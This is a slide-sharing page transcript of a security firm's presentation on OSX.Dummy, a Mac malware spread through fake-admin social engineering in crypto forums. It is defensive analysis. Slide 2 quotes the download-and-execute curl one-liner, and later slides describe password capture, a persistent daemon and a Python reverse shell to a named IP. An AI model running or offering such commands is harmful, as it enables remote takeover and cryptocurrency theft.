OSX.Dummy: Mac Malware Targets Crypto-Community Forums - PowerPoint PPT Presentation

About This Presentation
Title:

OSX.Dummy: Mac Malware Targets Crypto-Community Forums

Description:

Attackers posing as admins are asking users from crypto-community channel forums of Slack and Discord to infect themselves with malware through the use of simple, and rather dumb, social engineering tactics. Mac researchers agreed naming the malware OSX.Dummy, for a reason. – PowerPoint PPT presentation

Number of Views:51
Slides: 10
Provided by: phishingsolutions
Category: Other

less

Transcript and Presenter's Notes

Title: OSX.Dummy: Mac Malware Targets Crypto-Community Forums


1
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
Attackers posing as admins are asking users from
crypto-community channel forums of Slack and
Discord to infect themselves with malware through
the use of simple, and rather dumb, social
engineering tactics. Mac researchers agreed
naming the malware OSX.Dummy, for a reason.
www.izoologic.com
2
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
The following command was shared to unknowing
crypto forums
" cd /tmp curl -s curl MALICIOUS_URL gt
script chmod x script ./script"
If this obviously sketchy line of code managed to
trick someone by typing them via terminal
command, a huge 34 MB of malicious binary will be
downloaded and executed.
www.izoologic.com
3
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
The rather massive size was influenced by a
multitude of OpenSSL and V8 libraries that're
seem to be compiled within.
www.izoologic.com
4
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
What happens next? First the malware gives root
the permission access on the malicious script.
By doing this, the victim will be required to
enter the password in the terminal. The password,
then, gets saved by the malware to
"/tmp/dumpdummy".
www.izoologic.com
5
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
After finally reaching the victim's root, it
creates a reverse shell script file and launch a
persistent Daemon program so it won't stop
running and activating. Basically, a reverse
shell is a method in which the victim
communicates back to the attacker to offer admin
access and streamline a solid connection between
the two.
www.izoologic.com
6
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
In this case, the malicious reverse shell script
file uses Python programming language to open a
reverse shell connection to 185.243.115.230, on
Port 1337. If this succeeds, it'll be easy for
the attacker to control the victim's PC (with
root access) and execute admin commands.
www.izoologic.com
7
OSX.Dummy Mac Malware Targets Crypto-Community
Forums
As OSX.Dummy is only shared within
crypto-community forums, one can simply deduce
that its makers intended theft of
crypto-currency. To negate this malware
altogether though, is as simple (but effective)
as blocking off 185.243.115.230 - the particular
IP address to which the shell script is
maliciously communicating with.
www.izoologic.com
8
Level 1, 444 Castro Street, Mountain View,
California, USA
www.izoologic.com
1 650 396 3352
sales_at_izoologic.com
www.izoologic.com
9
(No Transcript)
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "OSX.Dummy: Mac Malware Targets Crypto-Community Forums" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!